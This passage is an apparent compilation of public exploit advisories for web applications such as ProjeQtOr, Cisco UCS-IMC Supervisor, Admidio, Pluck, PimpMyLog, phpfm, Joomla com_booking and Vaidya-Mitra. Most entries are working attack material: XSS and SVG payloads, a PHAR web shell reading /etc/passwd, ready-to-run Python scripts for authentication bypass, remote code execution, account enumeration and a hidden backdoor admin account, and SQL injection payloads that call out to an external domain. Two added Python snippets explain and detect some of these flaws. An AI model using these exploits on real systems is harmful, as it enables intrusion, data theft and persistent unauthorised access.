      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: navigate
      Sec-Fetch-User: ?1
      Sec-Fetch-Dest: document
      Referer: http://127.0.0.1/newsportal/admin/
      Accept-Encoding: gzip, deflate
      Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
      Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8
      Connection: close

      username=admin''&password=Test%40123&login=
      ```

      Res:

      ```http
      HTTP/1.1 200 OK
      Date: Sun, 09 Jul 2023 11:02:15 GMT
      Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
      X-Powered-By: PHP/8.1.17
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      Content-Length: 4733
      Connection: close
      Content-Type: text/html; charset=UTF-8

      <script>alert('Invalid Details');</script>
      <!DOCTYPE html>
      <html lang="en">
      <head>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <meta name="description" content="News Portal.">
      <meta name="author" content="PHPGurukul">
      <!-- App title -->
      <title>News Portal | Admin Panel</title>
      [...]
      ```
  12. ProjeQtOr Project Management System V10.4.1 - Multiple XSS

      ```
      Exploit Title: ProjeQtOr Project Management System V10.4.1 - Multiple XSS
      Version: V10.4.1
      Bugs: Multiple XSS
      Technology: PHP
      Vendor URL: https://www.projeqtor.org
      Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.4.1.zip/download
      Date of found: 09.07.2023
      Author: Mirabbas Ağalarov
      Tested on: Linux
      ```

      2. Technical Details & POC

      ### XSS-1 ###

      visit: http://localhost/projeqtor/view/refreshCronIconStatus.php?cronStatus=miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E&csrfToken=

      payload: miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E

      ### XSS-2 ###

      steps:

      1. login to account
      2. go projects and create project
      3. add attachment
      4. upload svg file

      ```xml
      <?xml version="1.0" standalone="no"?>
      <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
      <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
        <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
        <script type="text/javascript">
          alert(document.location);
        </script>
      </svg>
      ```

      5. Go to svg file ( http://localhost/projeqtor/files/attach/attachment_5/malas.svg )

      ### XSS-3 ###

      Go to below address (post request)

      ```http
      POST /projeqtor/tool/ack.php?destinationWidth=50&destinationHeight=0&isIE=&xhrPostDestination=resultDivMain&xhrPostIsResultMessage=true&xhrPostValidationType=attachment&xhrPostTimestamp=1688898776311&csrfToken= HTTP/1.1
      Host: localhost
      Content-Length: 35
      sec-ch-ua:
      Content-Type: application/x-www-form-urlencoded
      X-Requested-With: XMLHttpRequest
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
      sec-ch-ua-platform: ""
      Accept: */*
      Origin: http://localhost
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: empty
      Referer: http://localhost/projeqtor/view/main.php
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9
      Cookie: PHPSESSID=r5cjcsggl4j0oa9s70vchaklf3
      Connection: close

      resultAck=<script>alert(4)</script>
      ```
  13. Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass

```python
"""
[+] Exploit Title: Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass
[+] Cisco IMC Supervisor - < 2.2.1.0
[+] Date: 08/21/2019
[+] Affected Component: /app/ui/ClientServlet?apiName=GetUserInfo
[+] Vendor: https://www.cisco.com/c/en/us/products/servers-unified-computing/integrated-management-controller-imc-supervisor/index.html
[+] Vulnerability Discovery : Pedro Ribeiro
[+] Exploit Author: Fatih Sencer
[+] CVE: CVE-2019-1937
----------------------------------------------------
Usage: ./python3 CiscoIMC-Bypass.py -u host
[+] Target https://xxxxxx.com
[+] Target OK
[+] Exploit Success
[+] Login name : admin
[+] Cookie : REDACTED
"""
import argparse, requests, warnings, json, random, string
from requests.packages.urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter('ignore', InsecureRequestWarning)


def init():
    parser = argparse.ArgumentParser(description='Cisco IMC Supervisor / Authentication Bypass')
    parser.add_argument('-u', '--host', help='Host', type=str, required=True)
    args = parser.parse_args()
    exploit(args)


def exploit(args):
    session = requests.Session()
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4)",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": "https://{}/".format(args.host),
        "X-Starship-UserSession-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)),
        "X-Starship-Request-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))
    }
    target = "https://{}/app/ui/ClientServlet?apiName=GetUserInfo".format(args.host)
    print("[+] Target {}".format(args.host))
    exp_send = session.get(target, headers=headers, verify=False, timeout=10)
    if exp_send.status_code == 200:
        print("[+] Target OK")
        body_data = json.loads(exp_send.text)
        if not (body_data.get('loginName') is None):
            print("[+] Exploit Success")
            print("[+] Login name : {}".format(body_data.get('loginName')))
            print("[+] Cookie : {}".format(session.cookies.get_dict()))
        else:
            print("[-] Exploit Failed")
    else:
        print("[-] N/A")
        exit()


if __name__ == "__main__":
    init()
```
  14. Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE)
Application: Admidio
Version: 4.2.10
Bugs: RCE
Technology: PHP
Vendor URL: https://www.admidio.org/
Software Link: https://www.admidio.org/download.php
Date of found: 10.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
Steps:
1. Log in to an account
2. Go to Announcements
3. Add Entry
4. Upload a .phar file in the image upload section. .phar file content:

```php
<?php echo system('cat /etc/passwd');?>
```

5. Visit the .phar file ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar )

Request:

```http
POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1
Host: localhost
Content-Length: 378
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=Announcements
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB
Connection: close

------WebKitFormBoundaryne9TRuC1tAqhR86r
Content-Disposition: form-data; name="upload"; filename="shell.phar"
Content-Type: application/octet-stream

<?php echo system('cat /etc/passwd');?>
------WebKitFormBoundaryne9TRuC1tAqhR86r
Content-Disposition: form-data; name="ckCsrfToken"

o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB
------WebKitFormBoundaryne9TRuC1tAqhR86r--
```
  15. # Exploit Title: WinterCMS < 1.2.3 - Persistent Cross-Site Scripting
# Exploit Author: abhishek morla
# Google Dork: N/A
# Date: 2023-07-10
# Vendor Homepage: https://wintercms.com/
# Software Link: https://github.com/wintercms/winter
# Version: 1.2.2
# Tested on: windows64bit / mozilla firefox
# CVE : CVE-2023-37269
# Report Link : https://github.com/wintercms/winter/security/advisories/GHSA-wjw2-4j7j-6gc3
# Video POC : https://youtu.be/Dqhq8rdrcqc

Title : Application is Vulnerable to Persistent Cross-Site Scripting via SVG File Upload in Custom Logo Upload Functionality

Description : WinterCMS < 1.2.3 lacks restrictions on uploading SVG files as website logos, making it vulnerable to a Persistent cross-site scripting (XSS) attack. This vulnerability arises from the ability of an attacker to embed malicious JavaScript content within an SVG file, which remains visible to all users, including anonymous visitors. Consequently, any user interaction with the affected page can inadvertently trigger the execution of the malicious script.

Payload:-

```xml
// image.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.cookie);
  </script>
</svg>
```

//Post Request

```http
POST /backend/system/settings/update/winter/backend/branding HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2
X-WINTER-REQUEST-HANDLER: formLogo::onUpload
Content-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206
Content-Length: 608
Origin: http://172.17.0.2
Connection: close
Cookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D

-----------------------------186411693022341939203410401206
Content-Disposition: form-data; name="file_data"; filename="image.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>
-----------------------------186411693022341939203410401206--
```

|-----------------------------------------EOF-----------------------------------------
  16. Pluck v4.7.18 - Remote Code Execution (RCE)

```python
#Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)
#Application: pluck
#Version: 4.7.18
#Bugs: RCE
#Technology: PHP
#Vendor URL: https://github.com/pluck-cms/pluck
#Software Link: https://github.com/pluck-cms/pluck
#Date of found: 10-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

login_url = "http://localhost/pluck/login.php"
upload_url = "http://localhost/pluck/admin.php?action=installmodule"
headers = {"Referer": login_url}
login_payload = {"cont1": "admin", "bogus": "", "submit": "Log in"}

file_path = input("ZIP file path: ")
multipart_data = MultipartEncoder(
    fields={
        "sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"),
        "submit": "Upload"
    }
)

session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)
if login_response.status_code == 200:
    print("Login account")
    upload_headers = {
        "Referer": upload_url,
        "Content-Type": multipart_data.content_type
    }
    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)
    if upload_response.status_code == 200:
        print("ZIP file download.")
    else:
        print("ZIP file download error. Response code:", upload_response.status_code)
else:
    print("Login problem. response code:", login_response.status_code)

rce_url = "http://localhost/pluck/data/modules/mirabbas/miri.php"
rce = requests.get(rce_url)
print(rce.text)
```
  17. PimpMyLog v1.7.14 - Improper access control

```python
# Exploit Title: PimpMyLog v1.7.14 - Improper access control
# Date: 2023-07-10
# Exploit Author: thoughtfault
# Vendor Homepage: https://www.pimpmylog.com/
# Software Link: https://github.com/potsky/PimpMyLog
# Version: 1.5.2-1.7.14
# Tested on: Ubuntu 22.04
# CVE : N/A
# Description: PimpMyLog suffers from improper access control on the account
# creation endpoint, allowing a remote attacker to create an admin account
# without any existing permissions. The username is not sanitized and can be
# leveraged as a vector for stored XSS. This allows the attacker to hide the
# presence of the backdoor account from legitimate admins. Depending on the
# previous configuration, an attacker may be able to view sensitive information
# in apache, iis, nginx, and/or php logs. The attacker can view server-side
# environmental variables through the debug feature, which may include
# passwords or api keys.

import requests
import argparse
from base64 import b64encode

# JavaScript stored in the username field; "{}" is substituted with the backdoor
# username before encoding (str.replace rather than str.format, because the
# script's own braces would otherwise be parsed as format fields).
js = """var table = document.getElementById("userlisttable");
var rows = table.getElementsByTagName("tr");
for (var i = 0; i < rows.length; i++) {
    var cells = rows[i].getElementsByTagName("td");
    for (var j = 0; j < cells.length; j++) {
        var anchors = cells[j].getElementsByTagName("a");
        for (var k = 0; k < anchors.length; k++) {
            if (
                anchors[k].innerText === "{}" ||
                anchors[k].innerText.includes("atob(") ||
                anchors[k].querySelector("script") !== null
            ) {
                rows[i].parentNode.removeChild(rows[i]);
            }
        }
    }
}
var userCountElement = document.querySelector('.lead');
var userCountText = userCountElement.textContent;
var userCount = parseInt(userCountText);
if (!isNaN(userCount)) {
    userCount--;
    userCountElement.textContent = userCount + ' Users';
}"""

payload = "<script>eval(atob('{}'));</script>"


def backdoor(url, username, password):
    config_url = url + '/inc/configure.php'
    print("[*] Creating admin account...")
    r = requests.post(config_url, data={'s': 'authsave', 'u': username, 'p': password})
    if r.status_code != 200:
        print("[!] An error occurred")
        return
    print("[*] Hiding admin account...")
    base64_js = b64encode(js.replace("{}", username).encode()).decode()
    xss_payload = payload.format(base64_js)
    r = requests.post(config_url, data={'s': 'authsave', 'u': xss_payload, 'p': password})
    if r.status_code != 200:
        print("[!] An error occurred")
        return
    print("[*] Exploit finished!")


parser = argparse.ArgumentParser()
parser.add_argument('--url', help='The base url of the target', required=True)
parser.add_argument('--username', default='backdoor', help='The username of the backdoor account')
parser.add_argument('--password', default='backdoor', help='The password of the backdoor account')
args = parser.parse_args()
backdoor(args.url.rstrip('/'), args.username, args.password)
```
  18. phpfm v1.7.9 - Authentication type juggling

```python
# Exploit Title: phpfm v1.7.9 - Authentication type juggling
# Date: 2023-07-10
# Exploit Author: thoughtfault
# Vendor Homepage: https://www.dulldusk.com/phpfm/
# Software Link: https://github.com/dulldusk/phpfm/
# Version: 1.6.1-1.7.9
# Tested on: Ubuntu 22.04
# CVE : N/A
"""
An authentication bypass exists when the hash of the password selected by the
user incidentally begins with 0e, 00e, and in some PHP versions, 0x. This is
because loose type comparison is performed between the password hash and the
loggedon value, which by default for an unauthenticated user is 0 and can
additionally be controlled by the attacker. This allows an attacker to bypass
the login and obtain remote code execution. A list of vulnerable password
hashes can be found here:
https://github.com/spaze/hashes/blob/master/md5.md
"""
import requests
import sys

if len(sys.argv) < 2:
    print(f"[*] Syntax: ./{__file__} http://target/")
    sys.exit(0)

url = sys.argv[1].rstrip('/') + "/index.php"
payload_name = "shell.php"
payload = '<?php echo "I am a shell"; ?>'
payload_url = url.replace("index.php", payload_name)

headers = {"Accept-Language": "en-US,en;q=0.5", "Cookie": "loggedon=0"}
files = {
    "dir_dest": (None, "/srv/http/"),
    "action": (None, "10"),
    "upfiles[]": ("shell.php", payload),
}

requests.post(url, headers=headers, files=files)
r = requests.get(payload_url)
if r.status_code == 200:
    print(f"[*] Exploit successful: {payload_url}")
    print(r.text)
else:
    print(f"[*] Exploit might have failed, payload url returned a non-200 status code of: {r.status_code}")
```
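Why a hash that begins with `0e` passes the check described above, worked through in Python as an added example (not phpfm's code): `php_loose_equals()` emulates the numeric-string rule of PHP's `==`, `is_magic_hash()` audits a stored hash for that shape, and the strict `hmac.compare_digest` gate is the fix. PHP 8 semantics are assumed for non-numeric strings, and the pre-PHP-7 `0x` case mentioned in the advisory is left out of the emulation.

```python
"""Why a password whose hash starts with 0e passes a loose PHP comparison, and the fix."""
import hashlib
import hmac
import re

# PHP's notion of a numeric string: optional sign, decimal or float literal,
# optional exponent, surrounding whitespace allowed.  "0e462..." matches and
# evaluates to 0 * 10^462... == 0.0.  (Assumption: PHP >= 7 semantics; the
# pre-7 "0x" hex form is deliberately left out of this emulation.)
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_is_numeric(s: str) -> bool:
    return _PHP_NUMERIC.match(s) is not None


def php_loose_equals(a, b) -> bool:
    """Emulate PHP's == for the int/string mixes a login check sees (PHP 8 rules:
    two numeric strings, or a numeric string and an int, compare as numbers;
    a non-numeric string and an int compare as strings)."""
    if isinstance(a, str) and isinstance(b, str):
        if php_is_numeric(a) and php_is_numeric(b):
            return float(a) == float(b)
        return a == b
    if isinstance(a, int) and isinstance(b, int):
        return a == b
    s, n = (a, b) if isinstance(a, str) else (b, a)
    if php_is_numeric(s):
        return float(s) == float(n)
    return s == str(n)


def is_magic_hash(hexdigest: str) -> bool:
    """True when PHP reads the hash as the float 0.0: one or more zeros, an 'e',
    then digits only (no a-f anywhere after the e)."""
    return re.fullmatch(r"0+e\d+", hexdigest.lower()) is not None


def vulnerable_check(stored_hash: str, loggedon_cookie) -> bool:
    """Models a gate written as `if ($hash == $_COOKIE['loggedon'])` in PHP."""
    return php_loose_equals(stored_hash, loggedon_cookie)


def fixed_check(stored_hash: str, loggedon_cookie) -> bool:
    """Same gate done right: same type, constant-time byte comparison
    (=== plus hash_equals() in PHP)."""
    if not isinstance(loggedon_cookie, str):
        return False
    return hmac.compare_digest(stored_hash.encode(), loggedon_cookie.encode())


# Constructed demo values.  md5("240610708") is a well-known "magic" hash:
# it starts with 0e and is followed only by digits.
MAGIC_HASH = hashlib.md5(b"240610708").hexdigest()
ORDINARY_HASH = hashlib.md5(b"password").hexdigest()
ANON_COOKIE = "0"  # the advisory's default loggedon value for an unauthenticated user

if __name__ == "__main__":
    print("magic hash      :", MAGIC_HASH, "magic?", is_magic_hash(MAGIC_HASH))
    print("loose  == '0'   :", vulnerable_check(MAGIC_HASH, ANON_COOKIE))    # True: bypass
    print("strict == '0'   :", fixed_check(MAGIC_HASH, ANON_COOKIE))         # False
    print("ordinary loose  :", vulnerable_check(ORDINARY_HASH, ANON_COOKIE))  # False
```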
  19. Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)

```python
# Exploit Title: Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)
# Google Dork: inurl:"index.php?option=com_booking"
# Date: 07/12/2023
# Exploit Author: qw3rTyTy
# Vendor Homepage: http://www.artio.net/
# Software Link: http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download
# Version: 2.4.9
# Tested on: Slackware/Nginx/Joomla! 3.10.11
#
##
# File: site/booking.php
#
#     <?php
#     [...]
#18   include_once (JPATH_COMPONENT_ADMINISTRATOR . DS . 'booking.php');
#     [...]
#
# File: admin/booking.php
#
#     <?php
#     [...]
#104  if (class_exists(($classname = AImporter::controller()))) {
#105      $controller = new $classname();
#106      /* @var $controller JController */
#107      $controller->execute(JRequest::getVar('task'));
#108      $controller->redirect();
#109  }
#     [...]
#
# File: admin/controllers/customer.php
#
#     <?php
#     [...]
#240  function getUserData() {
#241      $user = JFactory::getUser(JRequest::getInt('id'));
#242      $data = array('name' => $user->name, 'username' => $user->username, 'email' => $user->email);
#243      die(json_encode($data));
#244  }
#     [...]
#
# The following GET request is equivalent to doing a query like
# 'SELECT name, username, email FROM abcde_users WHERE id=123'.
#
# curl -X GET http://target/joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=123
#
# So, an attacker can easily enumerate all accounts by bruteforcing.
##

import argparse
import urllib.parse
import requests
from sys import exit


def enumerateAccounts(options):
    i = 1
    url = options.url
    url = url + "/index.php?option=com_booking&controller=customer&task=getUserData&id="
    while True:
        try:
            response = requests.get("{}{}".format(url, str(i)))
            if response.status_code == 200:
                try:
                    jsondocument = response.json()
                    if jsondocument["name"] != None:
                        print(jsondocument)
                except requests.exceptions.JSONDecodeError:
                    raise
            else:
                break
        except Exception as ex:
            print(ex)
            break
        i += 1


def main():
    p = argparse.ArgumentParser()
    p.add_argument("-u", "--url", type=str, required=True)
    parsed = p.parse_args()
    try:
        t = urllib.parse.urlparse(parsed.url)
    except ValueError as ex:
        print(ex)
        exit()
    if not t[0].startswith("http") and not t[0].startswith("https"):
        print("Improper URL given.")
        exit()
    if len(t[1]) == 0:
        print("Improper URL given.")
        exit()
    enumerateAccounts(parsed)


if __name__ == "__main__":
    main()
```
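Detecting the enumeration pattern above from the server side, as an added example that is not part of the advisory: it parses Combined Log Format access-log lines, groups `task=getUserData` requests by client, and flags a client that asks for many distinct `id` values inside a short window. The log lines, IPs and timestamps are constructed for the demo.

```python
"""Flag com_booking getUserData enumeration in web-server access logs."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlparse

# Combined Log Format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict with ip, ts, status and the query fields that matter, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    qs = parse_qs(urlparse(m["path"]).query)
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "status": int(m["status"]),
        "option": qs.get("option", [""])[0],
        "task": qs.get("task", [""])[0],
        "id": qs.get("id", [""])[0],
    }


def is_user_lookup(ev):
    """The request shape the advisory describes: com_booking + getUserData."""
    return ev["option"] == "com_booking" and ev["task"] == "getUserData"


def detect_enumeration(lines, min_ids=5, window_seconds=60):
    """Return {ip: sorted distinct ids} for every client that looked up at least
    min_ids distinct ids within any window_seconds-long span of its requests."""
    by_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and is_user_lookup(ev):
            by_ip[ev["ip"]].append(ev)
    flagged = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(events)):
            # slide the window start forward until it fits in window_seconds
            while (events[end]["ts"] - events[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            if len({e["id"] for e in events[start:end + 1]}) >= min_ids:
                flagged[ip] = sorted({e["id"] for e in events}, key=lambda s: (len(s), s))
                break
    return flagged


# Constructed sample: one client walks id=1..6 in six seconds, another makes a
# single legitimate lookup and then an unrelated article request.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jul/2023:10:00:0%d +0000] "GET /joomla/index.php?option=com_booking'
    '&controller=customer&task=getUserData&id=%d HTTP/1.1" 200 87 "-" "python-requests/2.31.0"' % (i, i)
    for i in range(1, 7)
] + [
    '198.51.100.7 - - [12/Jul/2023:10:00:03 +0000] "GET /joomla/index.php?option=com_booking'
    '&controller=customer&task=getUserData&id=42 HTTP/1.1" 200 91 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Jul/2023:10:00:04 +0000] "GET /joomla/index.php?option=com_content'
    '&view=article&id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ids in detect_enumeration(SAMPLE_LOG).items():
        print("enumeration from %s: ids %s" % (ip, ", ".join(ids)))
```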
  20. ## Title: Vaidya-Mitra 1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 07.12.2023
## Vendor: https://mayurik.com/
## Software: free: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html, https://mayurik.com/source-code/P5890/best-hospital-management-system-in-php
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `useremail` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+' was submitted in the useremail parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can easily steal all information from this system, such as login credentials, phone numbers, etc.

STATUS: HIGH Vulnerability

[+]Payload:

```mysql
---
Parameter: useremail (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: [email protected]'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' RLIKE (SELECT (CASE WHEN (5532=5532) THEN 0x6d61797572692e696e666f737061636540676d61696c2e636f6d+(select load_file(0x5c5c5c5c6c726730667377767533773131677039727237656b33623734796172796c6d637030686e3762772e6f6173746966792e636f6d5c5c6d6576))+'' ELSE 0x28 END)) AND 'tsyu'='tsyu&userpassword=rootadmin

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: [email protected]'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' AND (SELECT 3518 FROM(SELECT COUNT(*),CONCAT(0x716a766a71,(SELECT (ELT(3518=3518,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gHln'='gHln&userpassword=rootadmin

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: [email protected]'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' OR (SELECT 4396 FROM (SELECT(SLEEP(3)))iEbq) AND 'ZWBa'='ZWBa&userpassword=rootadmin
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/Vaidya-Mitra-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/07/vaidya-mitra-10-multiple-sqli.html)

## Time spent: 00:27:00
  21. #Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)
#Application: Backdrop Cms
#Version: v1.25.1
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: https://backdropcms.org/
#Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

2. Technical Details & POC
========================================
1. Log in to an account
2. Go to http://localhost/backdrop/?q=admin/config/system/site-information
3. Upload an SVG file with the following content:

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
